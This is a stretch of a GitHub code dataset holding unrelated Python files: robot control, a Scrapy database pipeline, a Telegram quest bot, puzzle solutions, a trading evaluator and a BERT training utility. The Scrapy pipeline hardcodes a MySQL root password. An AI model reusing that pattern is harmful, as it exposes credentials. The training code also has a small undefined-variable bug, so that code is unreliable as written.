self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n # self.front_right.set(-.3)\n # self.front_left.set(-.3)\n # self.back_right.set(-.3)\n # self.back_left.set(-.3)\n # if self.timer.hasElapsed(3):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # if self.timer.hasElapsed(5):\n # self.front_right.set(0)\n # self.front_left.set(0)\n # self.back_right.set(0)\n # self.back_left.set(0)\n \n # self.timer.stop()\n # self.timer.reset()\n\n\nif __name__ == \"__main__\": \n wpilib.run(MyRobot)","repo_name":"Brown-County-FIRST-Robotics/1716-2022-robot","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":16480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37493676072","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n# Scrape data --> Item Containers --> json /csv files\n# Scrape data --> Item Containers --> Pipeline --> SQL/Mongo database\n\n# import sqlite3\nimport mysql.connector\nimport pymongo\n\n\nclass QuotetutorialPipeline(object):\n\n def __init__(self):\n 
self.create_connection()\n self.create_table()\n self.connect_mongodb()\n\n def create_connection(self):\n # self.conn = sqlite3.connect(\"myquotes.db\")\n self.conn = mysql.connector.connect(host='localhost', user='root', passwd='Ehsan@1371', database='myquotes')\n\n self.curr = self.conn.cursor()\n\n def create_table(self):\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS quotes_tb\"\"\")\n self.curr.execute(\"\"\"create table quotes_tb(\n quote text,\n author text,\n tag text)\"\"\")\n\n # connected to mongodb\n def connect_mongodb(self):\n self.mongo_conn = pymongo.MongoClient('localhost')\n db = self.mongo_conn['myquotes']\n self.collection = db['quotes_tb']\n\n def process_item(self, item, spider):\n # insert into mongodb\n self.collection.insert(dict(item))\n\n self.store_db(item)\n\n print(\"Pipeline:\" + item['quote'][0])\n return item\n\n def store_db(self, item):\n # ? ==> for sqlite3\n # %s ==> for mysql\n\n self.curr.execute(\"\"\"INSERT INTO quotes_tb VALUES (%s,%s,%s)\"\"\", (\n item['quote'][0],\n item['author'][0],\n item['tag'][0]\n ))\n self.conn.commit()\n","repo_name":"Rahi-AI/practice","sub_path":"LearnScrapy/quotetutorial/quotetutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30021964223","text":"from aiogram import types\n\nfrom bot_settings import logging\nfrom send_msg import send_photo, send_text\n\n\nasync def task_location_seven(message: types.Message, key: str) -> None:\n \"\"\"Задание для седьмой локации\"\"\"\n voc = {\n 'st': 'Нет, не верно, попробуй ещё раз',\n 'pl': 'Нет, не он, попробуй ещё раз',\n 'sel': 'Нет, не верно, попробуй ещё раз',\n 'photo': 'Нет, не он, попробуй ещё раз',\n 'waiter': 'Точно! Это официант. Левше удобнее нести поднос в правой '\n 'руке, а расставлять еду и напитки левой, так как ведущая '\n 'рука работает, а другая просто зафиксирована.'\n }\n await send_text(message, voc[key])\n if key == 'waiter':\n await send_text(\n message, 'И вот что нам известно:\\n*В следующей локации нужно '\n 'будет найти последнее ключевое слово* Следуй в *дом Трех Бенуа*, '\n 'по адресу *Каменноостровский проспект 26-28* и найди там *двор '\n '#4*'\n )\n await message.edit_reply_markup()\n\n\nasync def task_location_nine(message: types.Message, key: str) -> None:\n \"\"\"Задание для девятой локации\"\"\"\n voc = {\n 'tamila': 'Нет, это точно не она. Попробуй ещё раз',\n 'jhon': 'Похоже что это не он. Попробуй ещё раз',\n 'kevin': 'Он бы наверно не пошел на такое. Попробуй ещё раз',\n 'bill': 'Да, точно, если перевернуть цифры _7718_ то можно увидеть имя'\n ' перступника - *Билл*.'\n }\n await send_text(message, voc[key])\n if key == 'bill':\n logging.info(f'User {message.chat.id}, {message.chat.username}'\n ' end the quest after location 9')\n await message.edit_reply_markup()\n await send_text(\n message, 'Теперь он от нас не уйдет! Спасибо большое за помощь! 
'\n            'На этом квест подошел к концу 🥺'\n        )\n        await send_text(message, 'До новых встреч!')\n        await send_photo(\n            message, 'https://www.dropbox.com/s/cwhxxsa384prcu1/unnamed.jpg'\n        )\n","repo_name":"pashpiter/MisterX_telegram_bot","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"71892519201","text":"import math\n# Two pointers\nclass Solution:\n    def isPalindrome(self, x: int) -> bool:\n        x = str(x)\n        left, right = 0, len(x) - 1\n        \n        while left < right:\n            if x[left] != x[right]:\n                return False\n            left += 1\n            right -= 1\n        return True\n\n'''\nTime complexity: O(N) with N the number of digits\nSpace complexity: O(N)\n'''\nclass Solution2:\n    def isPalindrome(self, x: int) -> bool:\n        if x < 0 or (x % 10 == 0 and x != 0):\n            return False\n        if x // 10 == 0:\n            return True\n        exponent = math.floor(math.log10(x))\n\n        while x != 0 and exponent > 0:\n            power = 10**exponent\n\n            if x % 10 != x // power:\n                return False\n            \n            x = (x % power) // 10\n            \n            exponent -= 2\n        return True\n\n'''\nTime complexity: O(N) with N the number of digits\nSpace complexity: O(1)\n'''\n\nx = 121\nsol = Solution2().isPalindrome(x)\nprint(sol)","repo_name":"ThibautHurson/LeetCode","sub_path":"9-palindrome_number.py","file_name":"9-palindrome_number.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"72113039841","text":"import src.fuzzy as fuzzy\nfrom src.generator import Generator\nfrom datetime import datetime as dt\n\n\nclass Evaluator:\n\n    def __init__(self, data, generator=None):\n        data_indicator = data.iloc[:, range(9, len(data.columns), 1)]\n        if generator is None:\n            self._generator = Generator(data_indicator)\n        else:\n            self._generator = generator\n        self._data = data\n\n    @property\n    def generator(self):\n        return self._generator\n\n    def CalcBrokerage(self, volume, price):\n        BrokerageRate = 0.2\n        minFee = 30\n        fee = volume * price * BrokerageRate / 100\n        if fee < minFee:\n            return 30\n        else:\n            return fee\n\n    def trade(self, data, Hold, Money):\n        if data['Signal'] > 0: # signal is buy, money must be enough to buy, otherwise can not buy\n            if Money > 0:\n                buy = round(Money * data['Signal'] / data['High'])\n                Hold = Hold + buy\n                Money = Money - buy * data['High'] - self.CalcBrokerage(buy, data['High'])\n        if data['Signal'] < 0: # signal is sell, hold must be enough to sell, otherwise can not sell\n            if Hold > 0: # data['Signal']<0\n                sell = -Hold * data['Signal']\n                Hold = Hold - sell\n                Money = Money + sell * data['Low'] - self.CalcBrokerage(sell, data['Low'])\n        fortune = Hold * data['Close'] + Money\n        return Hold, Money, fortune\n\n    def evaluate(self, ind, filename=\"\"):\n        \"\"\"\n        Evaluate the fitness value of the Chromosome object\n        The fitness value is the final wealth value after the 3-year training data\n\n        :param ind: individual Chromosome object\n        :return: the fitness value, i.e. 
wealth value\n \"\"\"\n start = dt.now()\n # rule_set = self._generator.create_rule_set(ind)\n rule_set, indicators = self._generator.create_rule_set(ind)\n data_selected = self._data[indicators]\n\n # Calculate the signals according to the fuzzy rule set\n decision = fuzzy.DecisionMaker(rule_set, data_selected)\n\n # signals = pd.DataFrame([0.5, -0.4, 0.2, 0.4, 0.1, -0.2, -0.3, 0.2, 0.3, 0.1], index=self._data.index,columns=['Signal'])\n\n signals = []\n # signals = decision.defuzzify(self._data) #signal is a dataframe\n for row_index, data_row in zip(range(len(data_selected)), data_selected.iterrows()):\n dictionary = dict(data_row[1])\n signal = decision.defuzzify(dictionary)\n signals.append(signal)\n\n self._data['Signal'] = signals\n print(\"::::: [evaluator] Calculate signals \", dt.now() - start, \":::::\")\n\n start = dt.now()\n # Calculate the fitness value according to the trading signals\n Hold = 0\n Money = 10000000\n Fortune = []\n for i, row in self._data.iterrows():\n Hold, Money, fortune = self.trade(row, Hold, Money)\n Fortune.append(fortune)\n self._data['Fortune'] = Fortune\n # self._data['Operation'] = 0\n # self._data.Operation[self._data.Signal > 0] = 1\n # self._data.Operation[self._data.Signal < 0] = -1\n fit_val = self._data.iloc[-1]['Fortune']\n\n print(\"::::: [evaluator] Calculate fitness value\", dt.now() - start, \":::::\")\n return fit_val\n","repo_name":"Sitao-zz/SignalProcessing","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2946057047","text":"P = int(input())\nQ = [ int(i) for i in input().split()]\nP = len(Q)\nU = 0\nfor Xt in range(0,P-2):\n for Yt in range(Xt+1, P-1):\n for Zt in range(Yt+1, P):\n if Q[Xt] > Q[Yt] > Q[Zt] :\n U =U+ 1\nprint(U)\n","repo_name":"manjupriyabalaji/pythonprog","sub_path":"36pro.py","file_name":"36pro.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13462074112","text":"from sys import stdin\r\nfrom math import ceil\r\ninput = stdin.readline\r\n\r\ns = input().rstrip()\r\nl = len(s)\r\n\r\nif s == s[0] * l:\r\n print(-1)\r\nelif s[:l//2][::-1] == s[ceil(l/2):]:\r\n print(l-1)\r\nelse:\r\n print(l) ","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/15927. 
회문은 회문아니야!!/회문은 회문아니야!!.py","file_name":"회문은 회문아니야!!.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4882469693","text":"from itertools import combinations\nif __name__ == \"__main__\":\n line = input()\n line = line.split(' ')\n M = int(line[0])\n numbers = [int(line[i]) for i in range(1, M + 1)]\n all_comb = list(combinations(numbers, 6))\n for comb in all_comb:\n for c in comb:\n print(c, end=' ')\n print()\n","repo_name":"larrychen20011120/DSA","sub_path":"Algorithm/Homework/HW2/arashi_lottery.py","file_name":"arashi_lottery.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24297318733","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 30 21:28:21 2022\n@author:ginnyzhu\nutility functions \n\n\"\"\"\n#general\nimport logging\nimport pickle\nimport json\nimport dill\nimport os\nimport sys \nimport pandas as pd\nimport numpy as np\nimport time\nimport datetime\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport datefinder\n\n\n#fancy libraries\nimport torch \nimport torch.autograd as ag\nfrom termcolor import colored\n\"\"\"\nneed to fix master and year_weight stuff\n\"\"\"\n# parent sibling folder \nsys.path.append('../../')\nfrom RFOrecsys.weight.year_weight import YearWeight\nfrom functools import reduce\nimport itertools\n\n##### Data loading related\n\n#processing all the publications first \ndef get_corpus_and_dict(df, id_col, filepickle, field1, field2, out_addr = '', name1 ='corpus', name2 ='corpus_dict'):\n '''\n get a list of id order\n do the (repetitive) content list appending\n then also ids to content dictionary\n '''\n id_ls = df[id_col].tolist()\n corpus = [] #check if a list or list of listst\n corpus_dict = {}\n for id in id_ls:\n temp = filepickle[str(id)][field1] + ' ' + filepickle[str(id)][field2]\n corpus.append(temp)\n corpus_dict[id] = temp\n \n print('length of the corpus', len(corpus))# 106,446\n print('sample of the corpus', corpus[:2])\n #dump these lists:\n with open(out_addr + name1+ '.pickle', 'wb') as f:\n pickle.dump(corpus, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(out_addr + name2+ '.pickle', 'wb') as f:\n pickle.dump(corpus_dict, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n return corpus, corpus_dict\n\n#for the nih rfa processing \ndef get_corpus_and_dict2(df, id_col, filecsv, file_id_col, field1, field2, out_addr = '', name1 ='corpus', name2 ='corpus_dict'):\n '''\n get a list of id order\n do the (repetitive) content list appending\n then also ids to content dictionary\n '''\n id_ls = df[id_col].tolist()\n corpus = [] #check if a list or list of listst\n corpus_dict = {}\n \n for id in id_ls:\n temp = filecsv.loc[filecsv[file_id_col]==id, field1].iloc[0] +' '+ filecsv.loc[filecsv[file_id_col]==id, field2].iloc[0]\n #break\n corpus.append(temp)\n corpus_dict[id] = temp\n \n print('length of the corpus', len(corpus))# 106,446\n print('sample of the corpus', corpus[:2])\n #dump these lists:\n with open(out_addr + name1+ '.pickle', 'wb') as f:\n pickle.dump(corpus, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(out_addr + name2+ '.pickle', 'wb') as f:\n pickle.dump(corpus_dict, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n return corpus, corpus_dict\n\n\n\n######training related\n# Function to calculate the accuracy of our 
predictions vs labels\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\ndef format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\n\ndef set_seed(seed_val):\n random.seed(seed_val)\n np.random.seed(seed_val)\n torch.manual_seed(seed_val)\n torch.cuda.manual_seed_all(seed_val)\n\n \ndef train_batch(Batch, model, optimizer, scheduler, cuda_device):# hyper_optim, vg): #optimizer, scheduler embScheduler,\n #modify furthere\n # emb related and actual model\n \n # Unpack this training batch from our dataloader. \n # `batch` contains three pytorch tensors:\n # [0]: input ids \n # [1]: attention masks\n # [2]:type_ids \n # [3]:labels\n # [4]:tfidf weights\n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n\n model.zero_grad() #because of the paramter tuning?\n\n loss, logits, Hidden = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask, \n labels=b_labels)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n optimizer.step()\n scheduler.step()\n \n\n return loss, logits\n\n\n\n\ndef evaluate_batch(Batch, model, cuda_device):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n \n #_, b_weights = model.test_tfidf(embBatch[0])\n #b_weights = torch.from_numpy(b_weights).cuda(1)\n # Tell pytorch not to bother with constructing the compute graph during\n # the forward pass,\n with torch.no_grad(): \n\n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels)\n \n #loss, logits = model(embHidden, b_labels, b_weights)\n \n\n # Move logits and labels to CPU\n logits_cpu = logits.detach().cpu().numpy()\n label_ids_cpu = b_labels.cpu().numpy()\n\n return loss, logits_cpu, label_ids_cpu\n \n \n \n \n \ndef predictions(model, test_loader, use_cuda, path):\n model.eval()\n #model.bertEmb.eval()\n predictions , true_labels = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n true_labels.append(label_ids_cpu)\n \n print('...DONE.')\n combine_predictions = np.concatenate(predictions, axis=0)\n combine_true_labels = np.concatenate(true_labels, axis=0)\n\n # Calculate accuracy\n acc = flat_accuracy(combine_predictions, combine_true_labels) #not great 0.930, just bert and different split\n print('Test Accuracy: %.3f' % acc) \n \n np.save(path + 'combine_predictions', combine_predictions)\n np.save(path + 'combine_true_labels', combine_true_labels)\n \n return combine_predictions, combine_true_labels\n\n\n\n\n \ndef train(epochs, model, train_loader, valid_loader, optimizer, scheduler, use_cuda, tokenizer, args):\n \n training_stats = []\n #### Measure the total training time for the whole run.\n total_t0 = time.time()\n best_acc = 0.\n for 
epoch_i in range(0, epochs):\n\n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # Measure how long the training epoch takes\n t0 = time.time()\n # Reset the total loss for this epoch.\n total_train_loss = 0\n model.train()\n #model.bertEmb.train()\n\n # For each batch of training data...\n for step, batch in enumerate(train_loader):#change this later \n\n # Progress update every 200 batches.\n if step % 200 == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_loader), elapsed))\n\n #b_weights = tfidf_vecs_weights[step* rfa.batch_size: (step+1)*rfa.batch_size]\n #depends on what outputs are returned in the model, unpack the values\n loss, logits = train_batch(Batch = batch, \n model = model, \n optimizer = optimizer,\n scheduler = scheduler, \n cuda_device = use_cuda)\n\n total_train_loss += loss.item()\n\n # Calculate the average loss over all of the batches.\n avg_train_loss = total_train_loss / len(train_loader) \n # Measure how long this epoch took.\n training_time = format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(training_time))\n\n\n # call evaluation\n # ========================================\n # Validation\n # ========================================\n # After the completion of each training epoch, measure our performance on validation\n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently during evaluation \n model.eval()\n #model.bertEmb.eval()\n\n # Tracking variables \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n\n\n for batch in valid_loader: \n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n\n total_eval_loss += loss.item()\n total_eval_accuracy += flat_accuracy(logits_cpu, label_ids_cpu)\n\n avg_val_accuracy = total_eval_accuracy / len(valid_loader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n avg_val_loss = total_eval_loss / len(valid_loader)\n\n validation_time = format_time(time.time() - t0)\n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n if avg_val_accuracy > best_acc:\n best_acc = avg_val_accuracy \n save_model(model_path = args.load_path, model = model, tokenizer = tokenizer, args = args)\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. 
Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n print(\"Total training took {:} (h:mm:ss)\".format(format_time(time.time()-total_t0)))\n best_dict = torch.load(load_path + 'model.st')\n model.load_state_dict(best_dict)\n \n return training_stats, model\n \n\ndef save_model(model_path, model, tokenizer, args):\n # saving models\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n print(\"Saving model to %s\" % model_path)\n \n #save model\n dill.dump(model, open(model_path +'model', 'wb'))\n torch.save(model.state_dict(), model_path + 'model.st') \n model = model.module if hasattr(model, 'module') else model # distributed/parallel training\n model.save_pretrained(model_path)\n tokenizer.save_pretrained(model_path)\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(model_path, 'training_args.bin'))\n\n \ndef train_uq(epochs, model, train_loader, valid_loader, optimizer, scheduler, use_cuda, i, load_path, \\\n tokenizer, logger, option = 'mcdrop'):\n \n set_seed(i)\n \n training_stats = []\n #### Measure the total training time for the whole run.\n total_t0 = time.time()\n best_acc = 0.\n for epoch_i in range(0, epochs):\n\n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # Measure how long the training epoch takes\n t0 = time.time()\n # Reset the total loss for this epoch.\n total_train_loss = 0\n model.train()\n\n # For each batch of training data...\n for step, batch in enumerate(train_loader):#change this later \n\n # Progress update every 200 batches.\n if step % 200 == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. 
Elapsed: {:}.'.format(step, len(train_loader), elapsed))\n\n #b_weights = tfidf_vecs_weights[step* rfa.batch_size: (step+1)*rfa.batch_size]\n #depends on what outputs are returned in the model, unpack the values\n loss, logits = train_batch(Batch = batch, \n model = model, \n optimizer = optimizer,\n scheduler = scheduler, \n cuda_device = use_cuda)\n total_train_loss += loss.item()\n\n # Calculate the average loss over all of the batches.\n avg_train_loss = total_train_loss / len(train_loader) \n # Measure how long this epoch took.\n training_time = format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(training_time))\n\n\n\n # call evaluation\n # ========================================\n # Validation\n # ========================================\n # After the completion of each training epoch, measure our performance on validation\n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently during evaluation \n model.eval()\n if option == 'mcdrop':\n enable_dropout(model)\n\n # Tracking variables \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n\n\n\n for batch in valid_loader: \n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n\n total_eval_loss += loss.item()\n total_eval_accuracy += flat_accuracy(logits_cpu, label_ids_cpu)\n\n avg_val_accuracy = total_eval_accuracy / len(valid_loader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n avg_val_loss = total_eval_loss / len(valid_loader)\n\n validation_time = format_time(time.time() - t0)\n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n if avg_val_accuracy > best_acc:\n best_acc = avg_val_accuracy \n save_model_uq(model_path = load_path, model = model, tokenizer = tokenizer, logger = logger)\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. 
Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n print(\"Total training took {:} (h:mm:ss)\".format(format_time(time.time()-total_t0)))\n logger.error(\"epoch {}, training loss = {}, valid loss = {}, valid_accuracy = {}, train time = {}, valid time = {}\".format(\\\n epoch_i +1, avg_train_loss, avg_val_loss, avg_val_accuracy, training_time, validation_time))\n \n best_dict = torch.load(load_path + 'pytorch_model.bin')\n model.load_state_dict(best_dict)\n \n return training_stats, model\n \n \n \ndef enable_dropout(model):\n \"\"\" Function to enable the dropout layers during test-time \"\"\"\n for m in model.modules():\n if m.__class__.__name__.startswith('Dropout'):\n m.train()\n \n \n \n \ndef save_model_uq(model_path, model, tokenizer, logger):\n # saving models\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n print(\"Saving model to %s\" % model_path) \n logger.error(\"Saving model and tokenizer to %s\" % model_path)\n \n #save model\n dill.dump(model, open(model_path + 'model', 'wb'))\n # torch.save(model.state_dict(), model_path + 'model.st')\n model.save_pretrained(model_path)\n tokenizer.save_pretrained(model_path)\n # torch.save(args, os.path.join(model_path, 'training_args.bin'))\n\n\n\n\ndef evaluate_batch_uq(Batch, model, cuda_device, T =1):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n \n output_list = []\n loss_list = []\n with torch.no_grad():\n for i in range(T):\n # total of T forward passes \n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels)\n output_list.append(torch.unsqueeze(logits, dim= 0))\n loss_list.append(torch.unsqueeze(loss, dim= 0))#loss)\n \n output_mean = torch.cat(output_list, 0).mean(dim=0)\n output_variance = torch.cat(output_list, 0).var(dim=0).mean().item()\n confidence = output_mean.data.cpu().numpy().max()\n output_loss = torch.cat(loss_list,0).mean()\n\n # Move logits and labels to CPU\n logits_cpu = output_mean.detach().cpu().numpy()\n label_ids_cpu = b_labels.to('cpu').numpy()\n\n return output_loss, logits_cpu, label_ids_cpu, output_variance, confidence \n \ndef predictions_uq(model, test_loader, use_cuda, path, option = 'mcdrop', T = 1):\n \n model.eval()\n if option == 'mcdrop':\n enable_dropout(model)\n \n predictions, true_labels = [], []\n variances, confis = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu, variance, confidence = evaluate_batch_uq(Batch = batch, \n model = model, \n cuda_device =use_cuda, T= T)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n true_labels.append(label_ids_cpu)\n # let's see \n variances.append(variance)\n confis.append(confidence)\n \n \n print('...DONE.')\n combine_predictions = np.concatenate(predictions, axis=0)\n combine_true_labels = np.concatenate(true_labels, axis=0)\n # let's see \n variances = np.asarray(variances)\n confis = np.asarray(confis)\n \n \n\n # Calculate accuracy\n acc = flat_accuracy(combine_predictions, combine_true_labels) #not great 0.930, just bert and different split\n print('Test Accuracy: %.3f' % acc) \n \n np.save(path + 'combine_predictions', combine_predictions)\n np.save(path + 'combine_true_labels', 
combine_true_labels)\n # let's see\n np.save(path + 'variances', variances) \n np.save(path + 'confidences', confis)\n \n return combine_predictions, combine_true_labels, variances, confis \n\n\n\ndef plot_train(training_stats, save_path = ''):\n \n # Display floats with two decimal places.\n pd.set_option('precision', 2)\n # Create a DataFrame from our training statistics.\n df_stats = pd.DataFrame(data=training_stats)\n # Use the 'epoch' as the row index.\n df_stats = df_stats.set_index('epoch')\n # A hack to force the column headers to wrap.\n #df = df.style.set_table_styles([dict(selector=\"th\",props=[('max-width', '70px')])])\n # Display the table.\n print(df_stats)\n df_stats.to_csv(save_path + 'df_stats.csv')\n \n # Use plot styling from seaborn.\n sns.set(style='darkgrid')\n # Increase the plot size and font size.\n sns.set(font_scale=1.5)\n plt.rcParams[\"figure.figsize\"] = (12,6)\n # Plot the learning curve.\n plt.plot(df_stats['Training Loss'], 'b-o', label=\"Training\")\n plt.plot(df_stats['Valid. Loss'], 'g-o', label=\"Validation\")\n # Label the plot.\n plt.title(\"Training & Validation Loss\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.xticks(list(df_stats.index))\n plt.savefig(save_path + 'train_val_loss.png')\n plt.show();\n\n \n \n \n\n \ndef prob(x):\n \"\"\"Compute prob from logits.\"\"\"\n return np.exp(x[:,-1]) / (np.exp(x[:,-1]) +1) \n \ndef create_smilarity_dict(citation_df, combine_predictions, save_path):\n \n probas = prob(combine_predictions)\n ## comment below when actual testing\n # citation_df = citation_df.iloc[:len(probas), :].copy()\n citation_df['pred_prob1'] = probas\n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n citation_df['pred'] = pred_flat\n citation_df2 = citation_df[citation_df['pred'] == 1]\n \n pred_grouped = citation_df2.groupby(\"pmid\").agg(**{\n \"rfas_recom\": pd.NamedAgg(column='rfaid', aggfunc=lambda x:x.to_list()),\n \"rfas_prob\": pd.NamedAgg(column='pred_prob1', aggfunc=lambda x:x.to_list()) \n }).reset_index()\n print(pred_grouped.shape)\n print(pred_grouped.head())\n \n pred_grouped.to_csv(save_path + 'pred_grouped.csv', index = False)\n pred_grouped['leng'] = pred_grouped['rfas_prob'].str.len()\n max_length = pred_grouped['leng'].max()\n \n similarity_dict = {}\n for _,row in pred_grouped.iterrows():\n d = dict(zip(row['rfas_recom'], row['rfas_prob']))\n sort_d = dict(sorted(d.items(), key=lambda x: x[1], reverse=True))\n #print(sort_d)\n #break\n similarity_dict[row['pmid']] = sort_d \n with open(save_path + 'similarity_dict', 'wb') as handle:\n pickle.dump(similarity_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return similarity_dict, max_length \n \n \n\n \ndef create_smilarity_dict2(citation_df, combine_predictions, save_path):\n \n #probas = prob(combine_predictions)\n probas = combine_predictions[:, -1]\n citation_df['pred_prob1'] = probas\n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n citation_df['pred'] = pred_flat\n citation_df2 = citation_df[citation_df['pred'] == 1]\n \n pred_grouped = citation_df2.groupby(\"pmid\").agg(**{\n \"rfas_recom\": pd.NamedAgg(column='rfaid', aggfunc=lambda x:x.to_list()),\n \"rfas_prob\": pd.NamedAgg(column='pred_prob1', aggfunc=lambda x:x.to_list()) \n }).reset_index()\n print(pred_grouped.shape)\n print(pred_grouped.head())\n \n pred_grouped.to_csv(save_path + 'pred_grouped.csv', index = False)\n pred_grouped['leng'] = pred_grouped['rfas_prob'].str.len()\n max_length = pred_grouped['leng'].max()\n \n similarity_dict = {}\n 
